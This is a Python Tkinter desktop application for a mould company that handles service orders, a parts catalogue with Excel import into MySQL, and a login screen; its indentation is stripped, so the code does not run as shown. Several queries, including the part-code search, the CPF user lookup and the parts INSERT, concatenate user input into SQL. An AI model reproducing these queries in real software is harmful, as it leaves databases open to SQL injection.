self.cursor.execute("select a.id, a.OS, a.Cliente, a.Produto, a.QTDE, a.TipoOS, a.DataPrevista, a.Estado from ordem_servico as a order by id desc limit 1")
osBuscada = self.cursor.fetchall()
#self.cursor.execute("select a.id, a.OS, b.Nome, a.Produto, a.QTDE, a.TipoOS, a.DataPrevista, a.Estado from ordem_servico as a join funcionarios as b on a.OrdemAbertura = b.id order by id desc limit 1")
#osBuscada = self.cursor.fetchall()
a = int(ultimoID)
b = int(osBuscada[0][0])
if a != b:
self.OrdemServico.insert("", "end", values=(osBuscada[0][0], osBuscada[0][1], osBuscada[0][2], osBuscada[0][3], osBuscada[0][4], osBuscada[0][5], osBuscada[0][6], osBuscada[0][7]))
'''
try:
#Consultoro no banco de dados as O.S finalizadas de modo distintas
self.cursor.execute("select OS, id from ordem_servico group by OS order by id desc limit 1")
osDistintas = self.cursor.fetchall()
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
a = int(ultimoID[0])
b = int(osDistintas[0][1])
if a != b:
self.cursor.execute("select id, DataInicial from concluidas where OS ="+str(osDistintas[0][0])+" limit 1")
linha = self.cursor.fetchall()
self.cursor.execute("select count(*) from concluidas where OS ="+str(osDistintas[0][0]))
contagemOperacoes = self.cursor.fetchall()
self.cursor.execute("select count(*) from concluidas where Tipo = 'Retrabalhar OS' and OS = "+str(osDistintas[0][0]))
contagemRetrabalho = self.cursor.fetchall()
#extraindo do banco de dados as informações e armazenando nas variáveis
ID = osDistintas[0][1]
if linha == []:
DataInicial = 'Não Disponível'
DataInicial = 'Não Disponível'
HoraInicial = 'Não Disponível'
HoraInicial = 'Não Disponível'
else:
DataInicial = str(linha[0][1])
DataInicial = DataInicial.split()[0]
HoraInicial = str(linha[0][1])
HoraInicial = HoraInicial.split()[1]
#Consulta SQL a ser feita por parametro
SQL = ("select TempGasto, TempGastoExt from concluidas where OS = "+str(osDistintas[0][0]))
horaTotal = self.somar_total_horas_gastas_os(SQL, 2)
#Adicionando as colunas da respectiva O.S na Treeview
self.OrdemServico.insert("", "end", values=(ID, osDistintas[0][0], DataInicial, HoraInicial, contagemOperacoes, contagemRetrabalho, horaTotal))
'''
#função dos botões de adcionar e remover itens da lista
def buscar_peca(self, event):
try:
self.cursor.execute("select * from pecas where CodPeca like '%"+self.campoCP.get()+"%'")
self.pecas = self.cursor.fetchall()
except: return ''
if self.pecas != []:
self.campoN['state'] = NORMAL
self.campoM['state'] = NORMAL
self.campoT['state'] = NORMAL
self.campoN.delete(0, END)
self.campoM.delete(0, END)
self.campoT.delete(0, END)
self.campoN.insert('end', self.pecas[0][1])
self.campoM.insert('end', self.pecas[0][3])
self.campoT.insert('end', self.pecas[0][4])
self.campoN['state'] = DISABLED
self.campoM['state'] = DISABLED
self.campoT['state'] = DISABLED
else:
self.campoN['state'] = NORMAL
self.campoM['state'] = NORMAL
self.campoT['state'] = NORMAL
self.campoN.delete(0, END)
self.campoM.delete(0, END)
self.campoT.delete(0, END)
self.campoN['state'] = DISABLED
self.campoM['state'] = DISABLED
self.campoT['state'] = DISABLED
def adcionar_peca_lista(self):
try:
if not int(self.campoQ.get()) >= 1:
return messagebox.showinfo(parent=self.janelaCriarOS, title='Quantidade não válida', message='Informe a quantidade de peça.')
except: return messagebox.showinfo(parent=self.janelaCriarOS, title='Quantidade não válida', message='Informe a quantidade de peça.')
#Verificando se o mesmo item já foi adcionado antes, caso não irá inserir agora
if not self.pecas[0][0] in self.count_lista:
self.count_lista.append(self.pecas[0][0])
self.listaPecas.insert("", "end", values=(self.pecas[0][0], self.pecas[0][1], self.pecas[0][2], self.campoQ.get(), self.pecas[0][3], self.pecas[0][4], self.pecas[0][5]))
self.campoN['state'] = NORMAL
self.campoM['state'] = NORMAL
self.campoT['state'] = NORMAL
self.campoCP.delete(0, END)
self.campoN.delete(0, END)
self.campoM.delete(0, END)
self.campoT.delete(0, END)
self.campoN['state'] = DISABLED
self.campoM['state'] = DISABLED
self.campoT['state'] = DISABLED
else: messagebox.showwarning(parent=self.janelaCriarOS, title='Alerta', message='Este item já foi adcionado.')
def remover_peca_lista(self):
try:
#atribuindo item a ser removido
itemSelecionado = self.listaPecas.selection()[0]
#removendo item da lista
indice = self.listaPecas.item(itemSelecionado, 'values')[0]
self.count_lista.remove(int(indice))
#removendo item da treeview
self.listaPecas.delete(itemSelecionado)
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
messagebox.showinfo(parent=self.janelaCriarOS, title='Linha não selecionada', message='Elemento não selecionado')
#funções que farão a troca entre a primeira parte e a segunda da janela
def exibir_primeira_aba(self):
try:
self.botFinalizarOS.place_forget()
self.frameOS4.place_forget()
self.frameOS5.place_forget()
except: pass
self.frameOS2.place(relx=0.020, rely=0.030, relwidth=0.960, relheight=0.400)
self.frameOS3.place(relx=0.020, rely=0.450, relwidth=0.960, relheight=0.450)
self.botProximoOS.place(relx=0.850, rely=0.920)
def exibir_segunda_aba(self):
self.frameOS2.place_forget()
self.frameOS3.place_forget()
self.botProximoOS.place_forget()
self.botFinalizarOS.place(relx=0.850, rely=0.920)
self.frameOS4.place(relx=0.020, rely=0.030, relwidth=0.960, relheight=0.300)
self.frameOS5.place(relx=0.020, rely=0.350, relwidth=0.960, relheight=0.550)
#labels e outros widgets que compoem a janela
def primeira_aba(self):
try:
self.cursor.execute('select id, Nome from funcionarios where CPF ='+self.user)
busca = self.cursor.fetchall()
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
if messagebox.showerror(parent=self.janelaInicial, title='Verifique a conexão', message='Sem conexão com Banco de Dados'):
return 0
else:
self.idOrdemAbertura = str(busca[0][0])
nome = busca[0][1]
self.frameOS1 = Frame(self.janelaCriarOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.frameOS1.place(relx=0.020, rely=0.030, relwidth=0.960, relheight=0.940)
self.frameOS2 = Frame(self.frameOS1, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.frameOS3 = Frame(self.frameOS1 ,highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
lbl = Label(self.frameOS2, font=('arial', 10), text='Cliente', bg='white')
lbl.place(relx=0.040, rely=0.030)
def format_campo_cliente(*args):
mask = varCampoCliente.get()
varCampoCliente.set(mask[:40])
def format_campo_dataP(*args):
mask = dataPrevi.get()
dataPrevi.set(mask[:10])
if len(mask) >= 1 and mask[-1] != '/' and not mask[-1].isnumeric():
dataPrevi.set(mask[0:len(mask) - 1])
#Se houver 2 dígitos no campo, e eles forem númericos...
if len(mask) == 2 and mask.isnumeric():
self.campoDataPrevista.delete(0, END) #Delete todo o campo
self.campoDataPrevista.insert(END, mask+'/') #E acrescente parênteses com o valor obtido dentro
elif len(mask) == 5 and mask[3:].isnumeric():
self.campoDataPrevista.delete(0, END) #Delete todo o campo
self.campoDataPrevista.insert(END, mask+'/') #E acrescente parênteses com o valor obtido dentro
def format_campo_os(*args):
mask = varCampoOS.get()
varCampoOS.set(mask[:11])
if len(mask) >= 1 and not mask[-1].isnumeric():
varCampoOS.set(mask[0:len(mask) - 1])
def format_campo_produto(*args):
mask = varProduto.get()
varProduto.set(mask[:30])
def format_campo_qtde(*args):
mask = varQTDE.get()
varQTDE.set(mask[:4])
if len(mask) >= 1 and not mask[-1].isnumeric():
varQTDE.set(mask[0:len(mask) - 1])
varCampoCliente = StringVar()
varCampoCliente.trace('w', format_campo_cliente)
dataPrevi = StringVar()
dataPrevi.trace('w', format_campo_dataP)
varCampoOS = StringVar()
varCampoOS.trace('w', format_campo_os)
varProduto = StringVar()
varProduto.trace('w', format_campo_produto)
varQTDE = StringVar()
varQTDE.trace('w', format_campo_qtde)
self.campoCliente = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varCampoCliente)
self.campoCliente.place(relx=0.040, rely=0.160, relwidth=0.600)
self.campoCliente.focus_force()
lbl = Label(self.frameOS2, font=('arial', 10), text='O.S', bg='white')
lbl.place(relx=0.780, rely=0.030)
self.campoNumOS = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varCampoOS)
self.campoNumOS.place(relx=0.780, rely=0.160, relwidth=0.180)
lbl = Label(self.frameOS2, font=('arial', 10), text='Produto', bg='white')
lbl.place(relx=0.040, rely=0.370)
self.campoProduto = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varProduto)
self.campoProduto.place(relx=0.040, rely=0.490, relwidth=0.500)
lbl = Label(self.frameOS2, font=('arial', 10), text='QTDE', bg='white')
lbl.place(relx=0.600, rely=0.370)
self.campoQTDE = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varQTDE)
self.campoQTDE.place(relx=0.600, rely=0.490, relwidth=0.080)
lbl = Label(self.frameOS2, font=('arial', 10), text='Data Prevista', bg='white')
lbl.place(relx=0.800, rely=0.370)
self.campoDataPrevista = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2, textvariable=dataPrevi)
self.campoDataPrevista.place(relx=0.800, rely=0.490, relwidth=0.180)
lbl = Label(self.frameOS2, font=('arial', 10), text='Ord. de Abertura', bg='white')
lbl.place(relx=0.040, rely=0.700)
self.campoOrdemAbertura = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2)
self.campoOrdemAbertura.place(relx=0.040, rely=0.820, relwidth=0.500)
self.campoOrdemAbertura.insert('end', nome)
self.campoOrdemAbertura['state'] = DISABLED
lbl = Label(self.frameOS2, font=('arial', 10), text='Tipo de Pedido', bg='white')
lbl.place(relx=0.700, rely=0.700)
self.tipoOS = ttk.Combobox(self.frameOS2, font=('arial',10), state='readonly')
self.tipoOS['values'] = ('Select', 'Comum', 'Urgente', 'Interno', 'Corretivo', 'Preventivo')
self.tipoOS.current(0)
self.tipoOS.place(relx=0.700, rely=0.820)
lbl = Label(self.frameOS3, font=('arial', 10), text='Complemento', bg='white')
lbl.place(relx=0.040, rely=0.060)
self.campoComplemento = Text(self.frameOS3, font=('arial', 13), relief=GROOVE, border=2)
self.campoComplemento.place(relx=0.040, rely=0.160, relwidth=0.900, relheight=0.300)
lbl = Label(self.frameOS3, font=('arial', 10), text='Observação', bg='white')
lbl.place(relx=0.040, rely=0.480)
self.campoObservação = Text(self.frameOS3, font=('arial', 13), relief=GROOVE, border=2)
self.campoObservação.place(relx=0.040, rely=0.570, relwidth=0.900, relheight=0.300)
global imgProximo
imgProximo = PhotoImage(file='image/proximo.png')
self.botProximoOS = Button(self.frameOS1, image=imgProximo, border=0, relief=FLAT, bg='white', command=self.exibir_segunda_aba)
self.botProximoOS.place(relx=0.850, rely=0.920)
def segunda_aba(self):
self.frameOS4 = Frame(self.frameOS1, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.frameOS5 = Frame(self.frameOS1 ,highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
lbl = Label(self.frameOS4, font=('arial', 10), text='Código da Peça', bg='white')
lbl.place(relx=0.040, rely=0.050)
self.campoCP = Entry(self.frameOS4, font=('arial', 12), relief=GROOVE, border=2)
self.campoCP.place(relx=0.040, rely=0.220, relwidth=0.200)
self.campoCP.bind("<Return>", self.buscar_peca)
botaoBuscar = Button(self.frameOS4, text='Ok', border=2, command = lambda: self.buscar_peca(''))
botaoBuscar.place(relx=0.242, rely=0.215)
lbl = Label(self.frameOS4, font=('arial', 10), text='Nome da Peça', bg='white')
lbl.place(relx=0.450, rely=0.050)
self.campoN = Entry(self.frameOS4, font=('arial', 12), relief=GROOVE, border=2, state=DISABLED)
self.campoN.place(relx=0.450, rely=0.220, relwidth=0.500)
lbl = Label(self.frameOS4, font=('arial', 10), text='QTDE', bg='white')
lbl.place(relx=0.040, rely=0.500)
self.campoQ = Spinbox(self.frameOS4, from_=1, to=1000, font=('arial', 12), relief=GROOVE, border=2)
self.campoQ.place(relx=0.040, rely=0.680, relwidth=0.080)
lbl = Label(self.frameOS4, font=('arial', 10), text='Material', bg='white')
lbl.place(relx=0.450, rely=0.420)
self.campoM = Entry(self.frameOS4, font=('arial', 12), relief=GROOVE, border=2, state=DISABLED)
self.campoM.place(relx=0.450, rely=0.620, relwidth=0.200)
lbl = Label(self.frameOS4, font=('arial', 10), text='Tratamento', bg='white')
lbl.place(relx=0.680, rely=0.420)
self.campoT = Entry(self.frameOS4, font=('arial', 12), relief=GROOVE, border=2, state=DISABLED)
self.campoT.place(relx=0.680, rely=0.620, relwidth=0.300)
botaAdd = Button(self.frameOS4, text='Adcionar', border=2, command=self.adcionar_peca_lista)
botaAdd.place(relx=0.310, rely=0.320)
botaRemove = Button(self.frameOS4, text='Remover', border=2, command=self.remover_peca_lista)
botaRemove.place(relx=0.310, rely=0.550)
self.listaPecas = ttk.Treeview(self.frameOS5, column=('1','2','3','4','5','6','7'), show='headings')
self.listaPecas.heading('1', text='ID')
self.listaPecas.heading('2', text='Nome da Peça')
self.listaPecas.heading('3', text='Cód. Peça')
self.listaPecas.heading('4', text='QTDE')
self.listaPecas.heading('5', text='Material')
self.listaPecas.heading('6', text='Tratamento')
self.listaPecas.heading('7', text='Cód. Desenho')
self.listaPecas.column("1", width=-20, anchor='n')
self.listaPecas.column("2", width=200, anchor='n')
self.listaPecas.column("3", width=40, anchor='n')
self.listaPecas.column("4", width=10, anchor='n')
self.listaPecas.column("5", width=90, anchor='n')
self.listaPecas.column("6", width=80, anchor='n')
self.listaPecas.column("7", width=80, anchor='n')
self.listaPecas.place(relx=0, rely=0, relwidth=0.975, relheight=0.999)
self.listaPecas.bind("<Escape>", lambda event: self.remover_focus(event, self.listaPecas))
scrollbar = Scrollbar(self.frameOS5, orient="vertical", command=self.listaPecas.yview)
self.listaPecas.configure(yscrollcommand=scrollbar.set)
scrollbar.place(relx=0.975, rely=0, relwidth=0.025, relheight=0.999)
global imgfinalizar
imgfinalizar = PhotoImage(file='image/finalizar.png')
self.botFinalizarOS = Button(self.frameOS1, image=imgfinalizar, border=0, relief=FLAT, bg='white', command=self.confirmar_tela_os)
def criar_ordem_de_servico(self):
self.janelaCriarOS = Toplevel()
self.janelaCriarOS.title('Criar Ordem de Serviço')
self.centraliza_tela(800, 500, self.janelaCriarOS)
self.janelaCriarOS['bg'] = 'white'
self.count_lista = list()
self.primeira_aba()
self.exibir_primeira_aba()
self.segunda_aba()
self.janelaCriarOS.transient(self.aba4)
self.janelaCriarOS.focus_force()
self.janelaCriarOS.grab_set()
self.janelaCriarOS.mainloop()
class Pecas:
#Bloco cadastro de peça manualmente e respectivas funções de inserção
def confirmarCamposCadPeca(self):
#Armazenando nas variáveis informações da peça a ser cadastrada
self.campP = self.descriPeca.get().upper()
self.campM = self.campoMaterial.get().upper()
self.campC = self.campoCodPeca.get()
self.campT = self.campoTratamento.get().upper()
self.campD = self.campoCodDesenho.get().upper()
#Realizando verificação de algum campo deixado em branco
if self.descriPeca.get() == '':
messagebox.showinfo(parent=self.janelaCadPeca, title='Alerta', message='A descrição de Peça é obrigatório.')
return False
elif self.campoCodPeca.get() == '':
messagebox.showinfo(parent=self.janelaCadPeca, title='Alerta', message='O código de Peça é obrigatório.')
return False
if self.campoMaterial.get() == '':
self.campM = 'Não informado'
if self.campoTratamento.get() == '':
self.campT = 'Não informado'
if self.campoCodDesenho.get() == '':
self.campD = 'Não informado'
return True
def salvar_peca(self):
dataCadastro = str(datetime.now())
try:
self.cursor.execute("INSERT INTO pecas VALUES (NULL, '"+self.campP+"','"+self.campC+"','"+self.campM+"','"+self.campT+"','"+self.campD+"','"+dataCadastro+"')")
except mysql.connector.errors.IntegrityError:
messagebox.showinfo(parent=self.janelaCadPeca, title='Alerta', message='Nº de peça já existente')
return False
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
messagebox.showerror(parent=self.janelaCadPeca, title='Alerta', message='Erro ao tentar inserir dados')
return False
else:
return True
def confirmar_cad_peca(self):
if not self.confirmarCamposCadPeca():
return ''
if not self.salvar_peca():
return ''
if messagebox.showinfo(parent=self.janelaCadPeca, title='Alerta', message='Peça cadastrada com sucesso'):
self.janelaCadPeca.destroy()
def janela_cadastrar_peca(self):
self.janelaCadPeca = Toplevel()
self.janelaCadPeca.title('Cadastrar Peça')
self.centraliza_tela(600, 300, self.janelaCadPeca)
self.janelaCadPeca['bg'] = 'white'
frame1 = Frame(self.janelaCadPeca, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
frame1.place(relx=0.020, rely=0.030, relwidth=0.960, relheight=0.940)
frame2 = Frame(frame1, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
frame2.place(relx=0.020, rely=0.050, relwidth=0.960, relheight=0.700)
def format_nome_peca(*args):
mask = varDescriPeca.get()
varDescriPeca.set(mask[:170])
def format_cod_peca(*args):
mask = varCodPeca.get()
varCodPeca.set(mask[:13])
if len(mask) >= 1 and not mask[-1].isnumeric():
varCodPeca.set(mask[0:len(mask) - 1])
def format_campo_material(*args):
mask = varMaterial.get()
varMaterial.set(mask[:30])
def format_tratamento(*args):
mask = varTratamento.get()
varTratamento.set(mask[:30])
def format_cod_desenho(*args):
mask = varCodDesenho.get()
varCodDesenho.set(mask[:15])
varDescriPeca = StringVar()
varDescriPeca.trace('w', format_nome_peca)
varMaterial = StringVar()
varMaterial.trace('w', format_campo_material)
varCodPeca = StringVar()
varCodPeca.trace('w', format_cod_peca)
varTratamento = StringVar()
varTratamento.trace('w', format_tratamento)
varCodDesenho = StringVar()
varCodDesenho.trace('w', format_cod_desenho)
lbl = Label(frame2, font=('arial', 10), text='Descrição da Peça **', bg='white', fg='#344f84')
lbl.place(relx=0.040, rely=0.030)
self.descriPeca = Entry(frame2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varDescriPeca)
self.descriPeca.place(relx=0.040, rely=0.160, relwidth=0.920)
self.descriPeca.focus_force()
lbl = Label(frame2, font=('arial', 10), text='Cód. da Peça **', bg='white', fg='#344f84')
lbl.place(relx=0.040, rely=0.370)
self.campoCodPeca = Entry(frame2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varCodPeca)
self.campoCodPeca.place(relx=0.040, rely=0.490, relwidth=0.200)
lbl = Label(frame2, font=('arial', 10), text='Material (Opcional)', bg='white', fg='#344f84')
lbl.place(relx=0.350, rely=0.370)
self.campoMaterial = Entry(frame2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varMaterial)
self.campoMaterial.place(relx=0.350, rely=0.490, relwidth=0.600)
lbl = Label(frame2, font=('arial', 10), text='Tratamento (Opcional)', bg='white', fg='#344f84')
lbl.place(relx=0.040, rely=0.700)
self.campoTratamento = Entry(frame2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varTratamento)
self.campoTratamento.place(relx=0.040, rely=0.820, relwidth=0.500)
lbl = Label(frame2, font=('arial', 10), text='Cód. do Desenho (Opcional)', bg='white', fg='#344f84')
lbl.place(relx=0.680, rely=0.700)
self.campoCodDesenho = Entry(frame2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varCodDesenho)
self.campoCodDesenho.place(relx=0.680, rely=0.820, relwidth=0.260)
imgfinalizar = PhotoImage(file='image/finalizar2.png')
botFinalizar = Button(frame1, image=imgfinalizar, border=0, relief=FLAT, bg='white', command=self.confirmar_cad_peca)
botFinalizar.place(relx=0.820, rely=0.850)
self.janelaCadPeca.transient(self.janelaPeca)
self.janelaCadPeca.focus_force()
self.janelaCadPeca.grab_set()
self.janelaCadPeca.mainloop()
#Bloco de exibição das peças e opções de cadastrar ou importar mais
def exibir_pecas_importacao(self):
#Lista para itens que não se encaixe entre os padrões de peça
listaItem = list()
idItem = 0
cont = 0
for dado in range(len(self.excel['Referência'])):
#armazenando colunas do excel nas variáveis
a = self.excel['Referência']
b = self.excel['Descrição']
#recebendo a quantidade de dados para fazer o progressbar se locomover
self.progressbar['value'] = dado
#verificando os itens que começam com 9 por serem peças
if a[dado][0] == '9':
#verificando quais dessas peças se encaixam no padrão de 13 caracteres
if len(a[dado]) == 13:
#exibindo informações das peças nas variávels
self.ll1['text'] = f'Referência: {a[dado]}'
self.ll2['text'] = f'Descrição: {b[dado]}'
try:
cont += 1
if cont <= 10:
idItem += 1
self.cursor.execute("INSERT INTO pecas VALUES ("+str(idItem)+", '"+b[dado]+"', '"+a[dado]+"', DEFAULT, DEFAULT, DEFAULT, '"+str(self.dataImport)+"')")
self.treeviewPecas.insert("", "end", values=(idItem, b[dado], a[dado], 'Não informado', 'Não informado', 'Não informado', str(self.dataImport)))
except mysql.connector.errors.IntegrityError: #Excessão caso o valor seja repetido
print('passou')
except mysql.connector.errors.OperationalError: #Excessão caso a conexão seja perdida no meio do processo
if messagebox.showerror(parent=self.janelaInicial, title='Conexão perdida', message='Erro ao importar dados, conexão perdida com Banco MYSQL.'):
self.janelaProcesso.destroy()
return 0
except Exception as erro: #Excessão global caso algum outro erro ocorra
print(f'{erro}, {(erro.__class__)}')
if messagebox.showerror(parent=self.janelaInicial, title='Falha na importação', message='Uma falha inesperada aconteceu na importação.'):
self.janelaProcesso.destroy()
return 0
#Caso as peças não tenham o valor padrão irá armazenar na lista
else:
listaItem.append(dado)
#Enviando messagem após operação bem sucedida
if messagebox.showinfo(parent=self.janelaInicial, title='Importação concluída', message='Importação concluída com sucesso!'):
self.janelaProcesso.destroy()
def abrir_arquivo(self):
#Abrindo arquivo XML
try:
self.caminhoXLS = filedialog.askopenfilename(title='Selecione o arquivo desejado', filetypes=(('Arquivos XLS', '*.xls'), ('All files', '*.*')))
#Lendo arquivo XML
self.excel = pd.read_excel(self.caminhoXLS)
except:
return 0
#Chamando função para Exibir os dados a serem tranferindo
self.janela_exibir_dados_importacao_xml()
def janela_exibir_dados_importacao_xml(self):
#Janela de exibição dos dados de importação XML
self.janelaProcesso = Toplevel()
self.janelaProcesso.title('Importando dados')
self.centraliza_tela(500, 200, self.janelaProcesso)
self.janelaProcesso['bg'] = 'white'
lbl = Label(self.janelaProcesso, text=f'Arquivo: {self.caminhoXLS}', font=('arial', 10), bg='white')
lbl.place(relx=0.0, rely=0.130)
self.ll1 = Label(self.janelaProcesso, text='Referência:', font=('arial', 10), bg='white')
self.ll1.place(relx=0.0, rely=0.300)
self.ll2 = Label(self.janelaProcesso, text='Descrição:', font=('arial', 10), bg='white')
self.ll2.place(relx=0.0, rely=0.400)
self.dataImport = datetime.now()
data = self.dataImport.strftime('Data de Importação: %H:%M:%S do %d/%m/%Y')
ll3 = Label(self.janelaProcesso, text=data, font=('arial', 10), bg='white')
ll3.place(relx=0.0, rely=0.500)
#Criando objeto de barra progressiva para exibir o carregamento
self.progressbar = ttk.Progressbar(self.janelaProcesso, orient='horizontal', mode='determinate', maximum=10483)
self.progressbar.place(relx=0.0, rely=0.800, relwidth=0.999)
#Thread que fará a importação do dados em XML e irá exibir
threading.Thread(target=self.exibir_pecas_importacao,).start()
self.janelaProcesso.transient(self.aba4)
self.janelaProcesso.focus_force()
self.janelaProcesso.grab_set()
self.janelaProcesso.mainloop()
def janela_exibir_pecas(self):
self.janelaPeca = Toplevel()
self.janelaPeca.title('Cadastrar Peça')
self.centraliza_tela(800, 500, self.janelaPeca)
self.janelaPeca['bg'] = 'white'
global img01
img01 = PhotoImage(file='image/ferramenta.png')
botCadPeca = Button(self.janelaPeca, text='Cad. Peça', image=img01, compound=TOP, font=('arial', 9), bg='white', fg='black', relief=SOLID, border=0, command=self.janela_cadastrar_peca)
botCadPeca.place(relx=0.050, rely=0.030)
global img02
img02 = PhotoImage(file='image/importar.png')
botImport = Button(self.janelaPeca, text='Import Dados', image=img02, compound=TOP, font=('arial', 9), bg='white', fg='black', relief=SOLID, border=0, command=self.abrir_arquivo)
botImport.place(relx=0.200, rely=0.030)
canvas = Canvas(self.janelaPeca, bg='#e1e1e1')
canvas.place(relx=0.050, rely=0.190, relwidth=0.900, relheight=0.005)
self.treeviewPecas = ttk.Treeview(self.janelaPeca, column=('1','2','3','4','5','6','7'), show='headings')
self.treeviewPecas.heading('1', text='ID')
self.treeviewPecas.heading('2', text='Descrição')
self.treeviewPecas.heading('3', text='Cod. Peça')
self.treeviewPecas.heading('4', text='Material')
self.treeviewPecas.heading('5', text='Tratamento')
self.treeviewPecas.heading('6', text='Cod. Desenho')
self.treeviewPecas.heading('7', text='Data Cadastrada')
self.treeviewPecas.column("1", width=1, anchor='n')
self.treeviewPecas.column("2", width=200, anchor='n')
self.treeviewPecas.column("3", width=100, anchor='n')
self.treeviewPecas.column("4", width=100, anchor='n')
self.treeviewPecas.column("5", width=100, anchor='n')
self.treeviewPecas.column("6", width=100, anchor='n')
self.treeviewPecas.column("7", width=100, anchor='n')
self.treeviewPecas.place(relx=0, rely=0.350, relwidth=0.975, relheight=0.640)
self.treeviewPecas.bind("<Escape>", lambda event: self.remover_focus(event, self.treeviewPecas))
scrollbar = Scrollbar(self.janelaPeca, orient="vertical", command=self.treeviewPecas.yview)
self.treeviewPecas.configure(yscrollcommand=scrollbar.set)
scrollbar.place(relx=0.975, rely=0.350, relwidth=0.025, relheight=0.640)
self.cursor.execute("select id, Descricao, CodPeca, Material, Tratamento, CodDesenho, DataCadastro from pecas")
listaItem = self.cursor.fetchall()
for peca in listaItem:
self.treeviewPecas.insert("", "end", values=(peca[0], peca[1], peca[2], peca[3], peca[4], peca[5], peca[6]))
self.janelaPeca.transient(self.aba4)
self.janelaPeca.focus_force()
self.janelaPeca.grab_set()
self.janelaPeca.mainloop()
class Application(Funcs, Database_Server, Ordem_Servico, Pecas):
def __init__(self):
self.janelaFuncio = tix.Tk()
self.janelaFuncio.title('Login Admin')
self.janelaFuncio.configure(background='white')
self.janelaFuncio.minsize(500, 400)
self.janelaFuncio.attributes('-alpha', 0.0)
#Chamando Função Para Centralizar a Tela
self.centraliza_tela(600, 600, self.janelaFuncio)
self.frameLogin = Frame(self.janelaFuncio, highlightbackground='white', highlightcolor='white', highlightthickness=5, bg='white')
self.frameLogin.place(relx=0.100, rely=0.150, relwidth=0.780, relheight=0.730)
logo = PhotoImage(file='image/logoMultimoldes.png')
lblLogo = Label(self.frameLogin, image=logo, bg='white')
lblLogo.place(relx=0.500, rely=0.130, anchor='center')
self.labelLogin = Label(self.frameLogin, text='Usuário', bg='white', fg='#344f84', font=('arial',15,'bold'))
self.labelLogin.place(relx=0.070, rely=0.420)
#Função local que verificará os campos de login colocando limites de capacidade
def limite_campos_login(*args):
varCPF = cLogin.get()
varSenha = cSenha.get()
if len(varCPF) > 11:
cLogin.set(varCPF[:-1])
if not varCPF.isnumeric():
cLogin.set(varCPF[:-1])
if len(varSenha) > 8:
cSenha.set(varSenha[:-1])
if not varSenha.isnumeric():
cSenha.set(varSenha[:-1])
#Configurando caracteres quando estiverem inserido nos campos
cLogin = StringVar()
cLogin.trace('w', limite_campos_login)
cSenha = StringVar()
cSenha.trace('w', limite_campos_login)
self.campLogin = Entry(self.frameLogin, font=('arial', 14), textvariable=cLogin, border=2, relief=GROOVE)
self.campLogin.place(relx=0.290, rely=0.430, relwidth=0.500)
self.campLogin.bind("<Return>", self.confirmar_login)
self.labelSenha = Label(self.frameLogin, text='Senha', bg='white', fg='#344f84', font=('arial',15,'bold'))
self.labelSenha.place(relx=0.070, rely=0.540)
self.campSenha = Entry(self.frameLogin, show='l', font=('wingdings', 14, 'bold'), textvariable=cSenha, border=2, relief=GROOVE)
self.campSenha.place(relx=0.290, rely=0.550, relwidth=0.500)
self.campSenha.bind("<Return>", self.confirmar_login)
self.botao = Button(self.frameLogin, text='Confirmar', fg='white', activeforeground='white', bg='#344f84', activebackground='#344f84', border=0, font=('arial', 13, 'bold'), width=10, command = lambda: self.confirmar_login(self.confirmar_login))
self.botao.place(relx=0.390, rely=0.750)
self.botao.bind("<Return>", self.confirmar_login)
self.janelaFuncio.after(3000, self.janelaFuncio.attributes, "-alpha", 0.93)
self.connection_database()
if not self.bancoConnect:
messagebox.showerror('Verifique a conexão', 'Sem conexão com Banco de Dados')
self.campLogin.focus_force()
self.janelaFuncio.mainloop()
def janela_raiz(self):
self.janelaInicial = Toplevel()
self.janelaInicial.title('Multimoldes Admin')
self.janelaInicial.iconbitmap('image/icone.ico')
self.janelaInicial.resizable(0,0)
self.sistemaOperacional = system()
#Configurando o ambiente para se maximizado de acordo com o sistema operacional
if self.sistemaOperacional == 'Windows':
self.janelaInicial.state('zoomed')
else:
self.janelaInicial.attributes('-zoomed', True)
corPadrao = self.janelaInicial['bg']
menubar = Menu(self.janelaInicial)
self.janelaInicial.config(menu=menubar)
filemenu = Menu(menubar)
filemenu2 = Menu(menubar)
menubar.add_cascade(label='Opções', menu=filemenu)
menubar.add_cascade(label='Configurações', menu=filemenu2)
menubar.add_cascade(label='Relatório', menu=filemenu2)
menubar.add_cascade(label='Sobre', menu=filemenu2)
filemenu.add_command(label='Abrir OS', command=self.criar_ordem_de_servico)
filemenu.add_command(label='Cad. Peça', command=self.janela_cadastrar_peca)
filemenu.add_command(label='Sair', command=self.sair)
#Criando e adicionando abas
self.abas = ttk.Notebook(self.janelaInicial)
self.aba1 = Frame(self.abas, bg='white')
self.aba2 = Frame(self.abas, bg='white')
self.aba3 = Frame(self.abas, bg='white')
self.aba4 = Frame(self.abas, bg='white')
self.abas.add(self.aba1, text='Principal')
self.abas.add(self.aba2, text='Funcionários')
self.abas.add(self.aba3, text='Cadastrar')
self.abas.add(self.aba4, text='Ord. de Serviço')
self.abas.place(relx=0, rely=0, relwidth=1, relheight=1)
self.framePri = Frame(self.aba4, bg='white', highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2)
self.framePri.place(relx=0.045, rely=0.010, relwidth=0.910, relheight=0.970)
